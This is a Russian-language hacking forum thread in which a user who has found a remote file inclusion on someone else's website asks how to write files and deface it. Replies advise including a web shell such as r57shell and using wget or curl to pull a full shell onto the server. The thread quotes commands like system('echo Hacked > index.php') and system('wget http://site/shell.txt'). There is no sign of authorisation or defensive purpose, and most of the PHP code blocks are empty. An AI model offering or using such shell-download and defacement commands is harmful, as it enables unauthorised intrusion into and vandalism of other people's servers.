![]() |
Не работает system("echo Hacked > index.php");
Нашёл на сайте удалённый инклуд. Могу подключать и выполнять любые PHP скрипты. Но есть одно но
Я не могу на том сервере создавать и писать в файлы PHP код:
PHP код:
Как можно это обойти? И вопрос в догонку: Как мне получить список файлов каталога, который находится на порядок выше? PHP код:
|
system() может быть запрещено использовать сервером
по поводу fopen() - это уже странно.. ты уверен, что прав хватает? я сомневаюсь... |
system разрешён. потому как
PHP код:
А вот то что прав не хватает - скорее оно так и есть. Что можно предпринять в этом случае? |
проинклудь шел какойнить и посмотри
|
Пытался проинклудить r57shell, но в итоге получаю пустую страницу...
|
Цитата:
Команда для листинга верхнего каталога - ls /../ |
Опа, спасибо... а я пытался сделать
PHP код:
Цитата:
Но всё же, как задефейсить в данном случае? :) |
С помощью качалки стоящей на сервере скачиваешь полноценный шелл - это либо wget, curl и т.д. если не стоит ничего есть команда lwp-mirror, почитай вобще в гуглу
что-то типа - system('wget http://shell.php') |
PHP код:
|
Выполняю комманду system('wget http://site/shell.txt'), а потом system('ls')
Изменений не видно... |
| Время: 11:05 |